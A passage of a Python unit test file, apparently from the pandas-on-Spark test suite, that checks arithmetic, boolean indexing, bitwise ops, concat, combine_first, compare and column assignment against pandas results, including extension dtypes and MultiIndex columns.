self._test_arithmetic_frame(self.pdf1, self.pdf2, check_extension=False)
self._test_arithmetic_series(self.pser1, self.pser2, check_extension=False)
@unittest.skipIf(not extension_dtypes_available, "pandas extension dtypes are not available")
def test_arithmetic_extension_dtypes(self):
self._test_arithmetic_frame(
self.pdf1.astype("Int64"), self.pdf2.astype("Int64"), check_extension=True
)
self._test_arithmetic_series(
self.pser1.astype(int).astype("Int64"),
self.pser2.astype(int).astype("Int64"),
check_extension=True,
)
@unittest.skipIf(
not extension_float_dtypes_available, "pandas extension float dtypes are not available"
)
def test_arithmetic_extension_float_dtypes(self):
self._test_arithmetic_frame(
self.pdf1.astype("Float64"), self.pdf2.astype("Float64"), check_extension=True
)
self._test_arithmetic_series(
self.pser1.astype("Float64"), self.pser2.astype("Float64"), check_extension=True
)
def _test_arithmetic_frame(self, pdf1, pdf2, *, check_extension):
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
def assert_eq(actual, expected):
if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
self.assert_eq(actual, expected, check_exact=not check_extension)
if check_extension:
if isinstance(actual, DataFrame):
for dtype in actual.dtypes:
self.assertTrue(isinstance(dtype, extension_dtypes))
else:
self.assertTrue(isinstance(actual.dtype, extension_dtypes))
else:
self.assert_eq(actual, expected)
assert_eq((psdf1.a - psdf2.b).sort_index(), (pdf1.a - pdf2.b).sort_index())
assert_eq((psdf1.a * psdf2.a).sort_index(), (pdf1.a * pdf2.a).sort_index())
if check_extension and not extension_float_dtypes_available:
self.assert_eq(
(psdf1["a"] / psdf2["a"]).sort_index(), (pdf1["a"] / pdf2["a"]).sort_index()
)
else:
assert_eq((psdf1["a"] / psdf2["a"]).sort_index(), (pdf1["a"] / pdf2["a"]).sort_index())
assert_eq((psdf1 + psdf2).sort_index(), (pdf1 + pdf2).sort_index())
columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
psdf1.columns = columns
psdf2.columns = columns
pdf1.columns = columns
pdf2.columns = columns
assert_eq(
(psdf1[("x", "a")] - psdf2[("x", "b")]).sort_index(),
(pdf1[("x", "a")] - pdf2[("x", "b")]).sort_index(),
)
assert_eq(
(psdf1[("x", "a")] - psdf2["x"]["b"]).sort_index(),
(pdf1[("x", "a")] - pdf2["x"]["b"]).sort_index(),
)
assert_eq(
(psdf1["x"]["a"] - psdf2[("x", "b")]).sort_index(),
(pdf1["x"]["a"] - pdf2[("x", "b")]).sort_index(),
)
assert_eq((psdf1 + psdf2).sort_index(), (pdf1 + pdf2).sort_index())
def _test_arithmetic_series(self, pser1, pser2, *, check_extension):
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
def assert_eq(actual, expected):
if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
self.assert_eq(actual, expected, check_exact=not check_extension)
if check_extension:
self.assertTrue(isinstance(actual.dtype, extension_dtypes))
else:
self.assert_eq(actual, expected)
assert_eq((psser1 + psser2).sort_index(), (pser1 + pser2).sort_index())
assert_eq((psser1 - psser2).sort_index(), (pser1 - pser2).sort_index())
assert_eq((psser1 * psser2).sort_index(), (pser1 * pser2).sort_index())
if check_extension and not extension_float_dtypes_available:
self.assert_eq((psser1 / psser2).sort_index(), (pser1 / pser2).sort_index())
else:
assert_eq((psser1 / psser2).sort_index(), (pser1 / pser2).sort_index())
def test_arithmetic_chain(self):
self._test_arithmetic_chain_frame(self.pdf1, self.pdf2, self.pdf3, check_extension=False)
self._test_arithmetic_chain_series(
self.pser1, self.pser2, self.pser3, check_extension=False
)
@unittest.skipIf(not extension_dtypes_available, "pandas extension dtypes are not available")
def test_arithmetic_chain_extension_dtypes(self):
self._test_arithmetic_chain_frame(
self.pdf1.astype("Int64"),
self.pdf2.astype("Int64"),
self.pdf3.astype("Int64"),
check_extension=True,
)
self._test_arithmetic_chain_series(
self.pser1.astype(int).astype("Int64"),
self.pser2.astype(int).astype("Int64"),
self.pser3.astype(int).astype("Int64"),
check_extension=True,
)
@unittest.skipIf(
not extension_float_dtypes_available, "pandas extension float dtypes are not available"
)
def test_arithmetic_chain_extension_float_dtypes(self):
self._test_arithmetic_chain_frame(
self.pdf1.astype("Float64"),
self.pdf2.astype("Float64"),
self.pdf3.astype("Float64"),
check_extension=True,
)
self._test_arithmetic_chain_series(
self.pser1.astype("Float64"),
self.pser2.astype("Float64"),
self.pser3.astype("Float64"),
check_extension=True,
)
def _test_arithmetic_chain_frame(self, pdf1, pdf2, pdf3, *, check_extension):
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
psdf3 = ps.from_pandas(pdf3)
common_columns = set(psdf1.columns).intersection(psdf2.columns).intersection(psdf3.columns)
def assert_eq(actual, expected):
if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
self.assert_eq(actual, expected, check_exact=not check_extension)
if check_extension:
if isinstance(actual, DataFrame):
for column, dtype in zip(actual.columns, actual.dtypes):
if column in common_columns:
self.assertTrue(isinstance(dtype, extension_dtypes))
else:
self.assertFalse(isinstance(dtype, extension_dtypes))
else:
self.assertTrue(isinstance(actual.dtype, extension_dtypes))
else:
self.assert_eq(actual, expected)
assert_eq(
(psdf1.a - psdf2.b - psdf3.c).sort_index(), (pdf1.a - pdf2.b - pdf3.c).sort_index()
)
assert_eq(
(psdf1.a * (psdf2.a * psdf3.c)).sort_index(), (pdf1.a * (pdf2.a * pdf3.c)).sort_index()
)
if check_extension and not extension_float_dtypes_available:
self.assert_eq(
(psdf1["a"] / psdf2["a"] / psdf3["c"]).sort_index(),
(pdf1["a"] / pdf2["a"] / pdf3["c"]).sort_index(),
)
else:
assert_eq(
(psdf1["a"] / psdf2["a"] / psdf3["c"]).sort_index(),
(pdf1["a"] / pdf2["a"] / pdf3["c"]).sort_index(),
)
if check_extension and (
LooseVersion("1.0") <= LooseVersion(pd.__version__) < LooseVersion("1.1")
):
self.assert_eq(
(psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index(), almost=True
)
else:
assert_eq((psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index())
columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
psdf1.columns = columns
psdf2.columns = columns
pdf1.columns = columns
pdf2.columns = columns
columns = pd.MultiIndex.from_tuples([("x", "b"), ("y", "c")])
psdf3.columns = columns
pdf3.columns = columns
common_columns = set(psdf1.columns).intersection(psdf2.columns).intersection(psdf3.columns)
assert_eq(
(psdf1[("x", "a")] - psdf2[("x", "b")] - psdf3[("y", "c")]).sort_index(),
(pdf1[("x", "a")] - pdf2[("x", "b")] - pdf3[("y", "c")]).sort_index(),
)
assert_eq(
(psdf1[("x", "a")] * (psdf2[("x", "b")] * psdf3[("y", "c")])).sort_index(),
(pdf1[("x", "a")] * (pdf2[("x", "b")] * pdf3[("y", "c")])).sort_index(),
)
if check_extension and (
LooseVersion("1.0") <= LooseVersion(pd.__version__) < LooseVersion("1.1")
):
self.assert_eq(
(psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index(), almost=True
)
else:
assert_eq((psdf1 + psdf2 - psdf3).sort_index(), (pdf1 + pdf2 - pdf3).sort_index())
def _test_arithmetic_chain_series(self, pser1, pser2, pser3, *, check_extension):
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
psser3 = ps.from_pandas(pser3)
def assert_eq(actual, expected):
if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
self.assert_eq(actual, expected, check_exact=not check_extension)
if check_extension:
self.assertTrue(isinstance(actual.dtype, extension_dtypes))
else:
self.assert_eq(actual, expected)
assert_eq((psser1 + psser2 - psser3).sort_index(), (pser1 + pser2 - pser3).sort_index())
assert_eq((psser1 * psser2 * psser3).sort_index(), (pser1 * pser2 * pser3).sort_index())
if check_extension and not extension_float_dtypes_available:
if LooseVersion(pd.__version__) >= LooseVersion("1.0"):
self.assert_eq(
(psser1 - psser2 / psser3).sort_index(), (pser1 - pser2 / pser3).sort_index()
)
else:
expected = pd.Series(
[249.0, np.nan, 0.0, 0.88, np.nan, np.nan, np.nan, np.nan, np.nan, -np.inf]
+ [np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan],
index=pd.MultiIndex(
[
["cow", "falcon", "koala", "koalas", "lama"],
["length", "power", "speed", "weight"],
],
[
[0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 3, 3, 3, 4, 4, 4],
[0, 1, 2, 2, 3, 0, 0, 1, 2, 3, 0, 0, 3, 3, 0, 2, 3],
],
),
)
self.assert_eq((psser1 - psser2 / psser3).sort_index(), expected)
else:
assert_eq((psser1 - psser2 / psser3).sort_index(), (pser1 - pser2 / pser3).sort_index())
assert_eq((psser1 + psser2 * psser3).sort_index(), (pser1 + pser2 * pser3).sort_index())
def test_mod(self):
pser = pd.Series([100, None, -300, None, 500, -700])
pser_other = pd.Series([-150] * 6)
psser = ps.from_pandas(pser)
psser_other = ps.from_pandas(pser_other)
self.assert_eq(psser.mod(psser_other).sort_index(), pser.mod(pser_other))
self.assert_eq(psser.mod(psser_other).sort_index(), pser.mod(pser_other))
self.assert_eq(psser.mod(psser_other).sort_index(), pser.mod(pser_other))
def test_rmod(self):
pser = pd.Series([100, None, -300, None, 500, -700])
pser_other = pd.Series([-150] * 6)
psser = ps.from_pandas(pser)
psser_other = ps.from_pandas(pser_other)
self.assert_eq(psser.rmod(psser_other).sort_index(), pser.rmod(pser_other))
self.assert_eq(psser.rmod(psser_other).sort_index(), pser.rmod(pser_other))
self.assert_eq(psser.rmod(psser_other).sort_index(), pser.rmod(pser_other))
def test_getitem_boolean_series(self):
pdf1 = pd.DataFrame(
{"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]}, index=[20, 10, 30, 0, 50]
)
pdf2 = pd.DataFrame(
{"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]},
index=[0, 30, 10, 20, 50],
)
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1[pdf2.A > -3].sort_index(), psdf1[psdf2.A > -3].sort_index())
self.assert_eq(pdf1.A[pdf2.A > -3].sort_index(), psdf1.A[psdf2.A > -3].sort_index())
self.assert_eq(
(pdf1.A + 1)[pdf2.A > -3].sort_index(), (psdf1.A + 1)[psdf2.A > -3].sort_index()
)
def test_loc_getitem_boolean_series(self):
pdf1 = pd.DataFrame(
{"A": [0, 1, 2, 3, 4], "B": [100, 200, 300, 400, 500]}, index=[20, 10, 30, 0, 50]
)
pdf2 = pd.DataFrame(
{"A": [0, -1, -2, -3, -4], "B": [-100, -200, -300, -400, -500]},
index=[20, 10, 30, 0, 50],
)
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
self.assert_eq(pdf1.loc[pdf2.A > -3].sort_index(), psdf1.loc[psdf2.A > -3].sort_index())
self.assert_eq(pdf1.A.loc[pdf2.A > -3].sort_index(), psdf1.A.loc[psdf2.A > -3].sort_index())
self.assert_eq(
(pdf1.A + 1).loc[pdf2.A > -3].sort_index(), (psdf1.A + 1).loc[psdf2.A > -3].sort_index()
)
def test_bitwise(self):
pser1 = pd.Series([True, False, True, False, np.nan, np.nan, True, False, np.nan])
pser2 = pd.Series([True, False, False, True, True, False, np.nan, np.nan, np.nan])
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(pser1 | pser2, (psser1 | psser2).sort_index())
self.assert_eq(pser1 & pser2, (psser1 & psser2).sort_index())
pser1 = pd.Series([True, False, np.nan], index=list("ABC"))
pser2 = pd.Series([False, True, np.nan], index=list("DEF"))
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(pser1 | pser2, (psser1 | psser2).sort_index())
self.assert_eq(pser1 & pser2, (psser1 & psser2).sort_index())
@unittest.skipIf(
not extension_object_dtypes_available, "pandas extension object dtypes are not available"
)
def test_bitwise_extension_dtype(self):
def assert_eq(actual, expected):
if LooseVersion("1.1") <= LooseVersion(pd.__version__) < LooseVersion("1.2.2"):
self.assert_eq(actual, expected, check_exact=False)
self.assertTrue(isinstance(actual.dtype, extension_dtypes))
else:
self.assert_eq(actual, expected)
pser1 = pd.Series(
[True, False, True, False, np.nan, np.nan, True, False, np.nan], dtype="boolean"
)
pser2 = pd.Series(
[True, False, False, True, True, False, np.nan, np.nan, np.nan], dtype="boolean"
)
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
assert_eq((psser1 | psser2).sort_index(), pser1 | pser2)
assert_eq((psser1 & psser2).sort_index(), pser1 & pser2)
pser1 = pd.Series([True, False, np.nan], index=list("ABC"), dtype="boolean")
pser2 = pd.Series([False, True, np.nan], index=list("DEF"), dtype="boolean")
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
assert_eq(
(psser1 | psser2).sort_index(),
pd.Series([True, None, None, None, True, None], index=list("ABCDEF"), dtype="boolean"),
)
assert_eq(
(psser1 & psser2).sort_index(),
pd.Series(
[None, False, None, False, None, None], index=list("ABCDEF"), dtype="boolean"
),
)
def test_concat_column_axis(self):
pdf1 = pd.DataFrame({"A": [0, 2, 4], "B": [1, 3, 5]}, index=[1, 2, 3])
pdf1.columns.names = ["AB"]
pdf2 = pd.DataFrame({"C": [1, 2, 3], "D": [4, 5, 6]}, index=[1, 3, 5])
pdf2.columns.names = ["CD"]
psdf1 = ps.from_pandas(pdf1)
psdf2 = ps.from_pandas(pdf2)
psdf3 = psdf1.copy()
psdf4 = psdf2.copy()
pdf3 = pdf1.copy()
pdf4 = pdf2.copy()
columns = pd.MultiIndex.from_tuples([("X", "A"), ("X", "B")], names=["X", "AB"])
pdf3.columns = columns
psdf3.columns = columns
columns = pd.MultiIndex.from_tuples([("X", "C"), ("X", "D")], names=["Y", "CD"])
pdf4.columns = columns
psdf4.columns = columns
pdf5 = pd.DataFrame({"A": [0, 2, 4], "B": [1, 3, 5]}, index=[1, 2, 3])
pdf6 = pd.DataFrame({"C": [1, 2, 3]}, index=[1, 3, 5])
psdf5 = ps.from_pandas(pdf5)
psdf6 = ps.from_pandas(pdf6)
ignore_indexes = [True, False]
joins = ["inner", "outer"]
objs = [
([psdf1.A, psdf2.C], [pdf1.A, pdf2.C]),
([psdf1.A, psdf2], [pdf1.A, pdf2]),
([psdf1.A, psdf2.C], [pdf1.A, pdf2.C]),
([psdf3[("X", "A")], psdf4[("X", "C")]], [pdf3[("X", "A")], pdf4[("X", "C")]]),
([psdf3, psdf4[("X", "C")]], [pdf3, pdf4[("X", "C")]]),
([psdf3[("X", "A")], psdf4], [pdf3[("X", "A")], pdf4]),
([psdf3, psdf4], [pdf3, pdf4]),
([psdf5, psdf6], [pdf5, pdf6]),
([psdf6, psdf5], [pdf6, pdf5]),
]
for ignore_index, join in product(ignore_indexes, joins):
for i, (psdfs, pdfs) in enumerate(objs):
with self.subTest(ignore_index=ignore_index, join=join, pdfs=pdfs, pair=i):
actual = ps.concat(psdfs, axis=1, ignore_index=ignore_index, join=join)
expected = pd.concat(pdfs, axis=1, ignore_index=ignore_index, join=join)
self.assert_eq(
repr(actual.sort_values(list(actual.columns)).reset_index(drop=True)),
repr(expected.sort_values(list(expected.columns)).reset_index(drop=True)),
)
def test_combine_first(self):
pser1 = pd.Series({"falcon": 330.0, "eagle": 160.0})
pser2 = pd.Series({"falcon": 345.0, "eagle": 200.0, "duck": 30.0})
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(
psser1.combine_first(psser2).sort_index(), pser1.combine_first(pser2).sort_index()
)
with self.assertRaisesRegex(
TypeError, "`combine_first` only allows `Series` for parameter `other`"
):
psser1.combine_first(50)
psser1.name = ("X", "A")
psser2.name = ("Y", "B")
pser1.name = ("X", "A")
pser2.name = ("Y", "B")
self.assert_eq(
psser1.combine_first(psser2).sort_index(), pser1.combine_first(pser2).sort_index()
)
midx1 = pd.MultiIndex(
[["lama", "cow", "falcon", "koala"], ["speed", "weight", "length", "power"]],
[[0, 3, 1, 1, 1, 2, 2, 2], [0, 2, 0, 3, 2, 0, 1, 3]],
)
midx2 = pd.MultiIndex(
[["lama", "cow", "falcon"], ["speed", "weight", "length"]],
[[0, 0, 0, 1, 1, 1, 2, 2, 2], [0, 1, 2, 0, 1, 2, 0, 1, 2]],
)
pser1 = pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1], index=midx1)
pser2 = pd.Series([-45, 200, -1.2, 30, -250, 1.5, 320, 1, -0.3], index=midx2)
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(
psser1.combine_first(psser2).sort_index(), pser1.combine_first(pser2).sort_index()
)
pdf1 = pd.DataFrame({"A": [None, 0], "B": [4, None]})
psdf1 = ps.from_pandas(pdf1)
pdf2 = pd.DataFrame({"C": [3, 3], "B": [1, 1]})
psdf2 = ps.from_pandas(pdf2)
if LooseVersion(pd.__version__) >= LooseVersion("1.2.0"):
self.assert_eq(pdf1.combine_first(pdf2), psdf1.combine_first(psdf2).sort_index())
else:
expected_pdf = pd.DataFrame({"A": [None, 0], "B": [4.0, 1.0], "C": [3, 3]})
self.assert_eq(expected_pdf, psdf1.combine_first(psdf2).sort_index())
pdf1.columns = pd.MultiIndex.from_tuples([("A", "willow"), ("B", "pine")])
psdf1 = ps.from_pandas(pdf1)
pdf2.columns = pd.MultiIndex.from_tuples([("C", "oak"), ("B", "pine")])
psdf2 = ps.from_pandas(pdf2)
if LooseVersion(pd.__version__) >= LooseVersion("1.2.0"):
self.assert_eq(pdf1.combine_first(pdf2), psdf1.combine_first(psdf2).sort_index())
else:
expected_pdf = pd.DataFrame({"A": [None, 0], "B": [4.0, 1.0], "C": [3, 3]})
expected_pdf.columns = pd.MultiIndex.from_tuples(
[("A", "willow"), ("B", "pine"), ("C", "oak")]
)
self.assert_eq(expected_pdf, psdf1.combine_first(psdf2).sort_index())
def test_insert(self):
pdf = pd.DataFrame([1, 2, 3])
psdf = ps.from_pandas(pdf)
pser = pd.Series([4, 5, 6])
psser = ps.from_pandas(pser)
psdf.insert(1, "y", psser)
pdf.insert(1, "y", pser)
self.assert_eq(psdf.sort_index(), pdf.sort_index())
#
pdf = pd.DataFrame([1, 2, 3], index=[10, 20, 30])
psdf = ps.from_pandas(pdf)
pser = pd.Series([4, 5, 6])
psser = ps.from_pandas(pser)
psdf.insert(1, "y", psser)
pdf.insert(1, "y", pser)
self.assert_eq(psdf.sort_index(), pdf.sort_index())
#
# DataFrame with Multi-index columns
#
pdf = pd.DataFrame({("x", "a"): [1, 2, 3]})
psdf = ps.from_pandas(pdf)
pser = pd.Series([4, 5, 6])
psser = ps.from_pandas(pser)
pdf = pd.DataFrame({("x", "a", "b"): [1, 2, 3]})
psdf = ps.from_pandas(pdf)
psdf.insert(0, "a", psser)
pdf.insert(0, "a", pser)
self.assert_eq(psdf.sort_index(), pdf.sort_index())
psdf.insert(0, ("b", "c", ""), psser)
pdf.insert(0, ("b", "c", ""), pser)
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_compare(self):
if LooseVersion(pd.__version__) >= LooseVersion("1.1"):
pser1 = pd.Series(["b", "c", np.nan, "g", np.nan])
pser2 = pd.Series(["a", "c", np.nan, np.nan, "h"])
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(
pser1.compare(pser2).sort_index(),
psser1.compare(psser2).sort_index(),
)
# `keep_shape=True`
self.assert_eq(
pser1.compare(pser2, keep_shape=True).sort_index(),
psser1.compare(psser2, keep_shape=True).sort_index(),
)
# `keep_equal=True`
self.assert_eq(
pser1.compare(pser2, keep_equal=True).sort_index(),
psser1.compare(psser2, keep_equal=True).sort_index(),
)
# `keep_shape=True` and `keep_equal=True`
self.assert_eq(
pser1.compare(pser2, keep_shape=True, keep_equal=True).sort_index(),
psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
)
# MultiIndex
pser1.index = pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
)
pser2.index = pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
)
psser1 = ps.from_pandas(pser1)
psser2 = ps.from_pandas(pser2)
self.assert_eq(
pser1.compare(pser2).sort_index(),
psser1.compare(psser2).sort_index(),
)
# `keep_shape=True` with MultiIndex
self.assert_eq(
pser1.compare(pser2, keep_shape=True).sort_index(),
psser1.compare(psser2, keep_shape=True).sort_index(),
)
# `keep_equal=True` with MultiIndex
self.assert_eq(
pser1.compare(pser2, keep_equal=True).sort_index(),
psser1.compare(psser2, keep_equal=True).sort_index(),
)
# `keep_shape=True` and `keep_equal=True` with MultiIndex
self.assert_eq(
pser1.compare(pser2, keep_shape=True, keep_equal=True).sort_index(),
psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
)
else:
psser1 = ps.Series(["b", "c", np.nan, "g", np.nan])
psser2 = ps.Series(["a", "c", np.nan, np.nan, "h"])
expected = ps.DataFrame(
[["b", "a"], ["g", None], [None, "h"]], index=[0, 3, 4], columns=["self", "other"]
)
self.assert_eq(expected, psser1.compare(psser2).sort_index())
# `keep_shape=True`
expected = ps.DataFrame(
[["b", "a"], [None, None], [None, None], ["g", None], [None, "h"]],
index=[0, 1, 2, 3, 4],
columns=["self", "other"],
)
self.assert_eq(
expected,
psser1.compare(psser2, keep_shape=True).sort_index(),
)
# `keep_equal=True`
expected = ps.DataFrame(
[["b", "a"], ["g", None], [None, "h"]], index=[0, 3, 4], columns=["self", "other"]
)
self.assert_eq(
expected,
psser1.compare(psser2, keep_equal=True).sort_index(),
)
# `keep_shape=True` and `keep_equal=True`
expected = ps.DataFrame(
[["b", "a"], ["c", "c"], [None, None], ["g", None], [None, "h"]],
index=[0, 1, 2, 3, 4],
columns=["self", "other"],
)
self.assert_eq(
expected,
psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
)
# MultiIndex
psser1 = ps.Series(
["b", "c", np.nan, "g", np.nan],
index=pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
),
)
psser2 = ps.Series(
["a", "c", np.nan, np.nan, "h"],
index=pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
),
)
expected = ps.DataFrame(
[["b", "a"], [None, "h"], ["g", None]],
index=pd.MultiIndex.from_tuples([("a", "x"), ("q", "l"), ("x", "k")]),
columns=["self", "other"],
)
self.assert_eq(expected, psser1.compare(psser2).sort_index())
# `keep_shape=True`
expected = ps.DataFrame(
[["b", "a"], [None, None], [None, None], [None, "h"], ["g", None]],
index=pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("q", "l"), ("x", "k")]
),
columns=["self", "other"],
)
self.assert_eq(
expected,
psser1.compare(psser2, keep_shape=True).sort_index(),
)
# `keep_equal=True`
expected = ps.DataFrame(
[["b", "a"], [None, "h"], ["g", None]],
index=pd.MultiIndex.from_tuples([("a", "x"), ("q", "l"), ("x", "k")]),
columns=["self", "other"],
)
self.assert_eq(
expected,
psser1.compare(psser2, keep_equal=True).sort_index(),
)
# `keep_shape=True` and `keep_equal=True`
expected = ps.DataFrame(
[["b", "a"], ["c", "c"], [None, None], [None, "h"], ["g", None]],
index=pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("q", "l"), ("x", "k")]
),
columns=["self", "other"],
)
self.assert_eq(
expected,
psser1.compare(psser2, keep_shape=True, keep_equal=True).sort_index(),
)
# Different Index
with self.assertRaisesRegex(
ValueError, "Can only compare identically-labeled Series objects"
):
psser1 = ps.Series(
[1, 2, 3, 4, 5],
index=pd.Index([1, 2, 3, 4, 5]),
)
psser2 = ps.Series(
[2, 2, 3, 4, 1],
index=pd.Index([5, 4, 3, 2, 1]),
)
psser1.compare(psser2)
# Different MultiIndex
with self.assertRaisesRegex(
ValueError, "Can only compare identically-labeled Series objects"
):
psser1 = ps.Series(
[1, 2, 3, 4, 5],
index=pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "z"), ("x", "k"), ("q", "l")]
),
)
psser2 = ps.Series(
[2, 2, 3, 4, 1],
index=pd.MultiIndex.from_tuples(
[("a", "x"), ("b", "y"), ("c", "a"), ("x", "k"), ("q", "l")]
),
)
psser1.compare(psser2)
def test_different_columns(self):
psdf1 = self.psdf1
psdf4 = self.psdf4
pdf1 = self.pdf1
pdf4 = self.pdf4
self.assert_eq((psdf1 + psdf4).sort_index(), (pdf1 + pdf4).sort_index(), almost=True)
# Multi-index columns
columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
psdf1.columns = columns
pdf1.columns = columns
columns = pd.MultiIndex.from_tuples([("z", "e"), ("z", "f")])
psdf4.columns = columns
pdf4.columns = columns
self.assert_eq((psdf1 + psdf4).sort_index(), (pdf1 + pdf4).sort_index(), almost=True)
def test_assignment_series(self):
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psser = psdf.a
pser = pdf.a
psdf["a"] = self.psdf2.a
pdf["a"] = self.pdf2.a
self.assert_eq(psdf.sort_index(), pdf.sort_index())
self.assert_eq(psser, pser)
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psser = psdf.a
pser = pdf.a
psdf["a"] = self.psdf2.b
pdf["a"] = self.pdf2.b
self.assert_eq(psdf.sort_index(), pdf.sort_index())
self.assert_eq(psser, pser)
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf["c"] = self.psdf2.a
pdf["c"] = self.pdf2.a
self.assert_eq(psdf.sort_index(), pdf.sort_index())
# Multi-index columns
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
psdf.columns = columns
pdf.columns = columns
psdf[("y", "c")] = self.psdf2.a
pdf[("y", "c")] = self.pdf2.a
self.assert_eq(psdf.sort_index(), pdf.sort_index())
pdf = pd.DataFrame({"a": [1, 2, 3], "Koalas": [0, 1, 2]}).set_index("Koalas", drop=False)
psdf = ps.from_pandas(pdf)
psdf.index.name = None
psdf["NEW"] = ps.Series([100, 200, 300])
pdf.index.name = None
pdf["NEW"] = pd.Series([100, 200, 300])
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_assignment_frame(self):
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psser = psdf.a
pser = pdf.a
psdf[["a", "b"]] = self.psdf1
pdf[["a", "b"]] = self.pdf1
self.assert_eq(psdf.sort_index(), pdf.sort_index())
self.assert_eq(psser, pser)
# 'c' does not exist in `psdf`.
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psser = psdf.a
pser = pdf.a
psdf[["b", "c"]] = self.psdf1
pdf[["b", "c"]] = self.pdf1
self.assert_eq(psdf.sort_index(), pdf.sort_index())
self.assert_eq(psser, pser)
# 'c' and 'd' do not exist in `psdf`.
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf[["c", "d"]] = self.psdf1
pdf[["c", "d"]] = self.pdf1
self.assert_eq(psdf.sort_index(), pdf.sort_index())
# Multi-index columns
columns = pd.MultiIndex.from_tuples([("x", "a"), ("x", "b")])
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf.columns = columns
pdf.columns = columns
psdf[[("y", "c"), ("z", "d")]] = self.psdf1
pdf[[("y", "c"), ("z", "d")]] = self.pdf1
self.assert_eq(psdf.sort_index(), pdf.sort_index())
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf1 = ps.from_pandas(self.pdf1)
pdf1 = self.pdf1
psdf1.columns = columns
pdf1.columns = columns
psdf[["c", "d"]] = psdf1
pdf[["c", "d"]] = pdf1
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_assignment_series_chain(self):
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf["a"] = self.psdf1.a
pdf["a"] = self.pdf1.a
psdf["a"] = self.psdf2.b
pdf["a"] = self.pdf2.b
psdf["d"] = self.psdf3.c
pdf["d"] = self.pdf3.c
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_assignment_frame_chain(self):
psdf = ps.from_pandas(self.pdf1)
pdf = self.pdf1
psdf[["a", "b"]] = self.psdf1
pdf[["a", "b"]] = self.pdf1
psdf[["e", "f"]] = self.psdf3
pdf[["e", "f"]] = self.pdf3
psdf[["b", "c"]] = self.psdf2
pdf[["b", "c"]] = self.pdf2
self.assert_eq(psdf.sort_index(), pdf.sort_index())
def test_multi_index_arithmetic(self):
psdf5 = self.psdf5
psdf6 = self.psdf6
pdf5 = self.pdf5
pdf6 = self.pdf6
# Series
self.assert_eq((psdf5.c - psdf6.e).sort_index(), (pdf5.c - pdf6.e).sort_index())
self.assert_eq((psdf5["c"] / psdf6["e"]).sort_index(), (pdf5["c"] / pdf6["e"]).sort_index())
# DataFrame
self.assert_eq((psdf5 + psdf6).sort_index(), (pdf5 + pdf6).sort_index(), almost=True)
def test_multi_index_assignment_series(self):
psdf = ps.from_pandas(self.pdf5)
pdf = self.pdf5
psdf["x"] = self.psdf6.e
pdf["x"] = self.pdf6.e
self.assert_eq(psdf.sort_index(), pdf.sort_index())
psdf = ps.from_pandas(self.pdf5)
pdf = self.pdf5
psdf["e"] = self.psdf6.e
pdf["e"] = self.pdf6.e
self.assert_eq(psdf.sort_index(), pdf.sort_index())
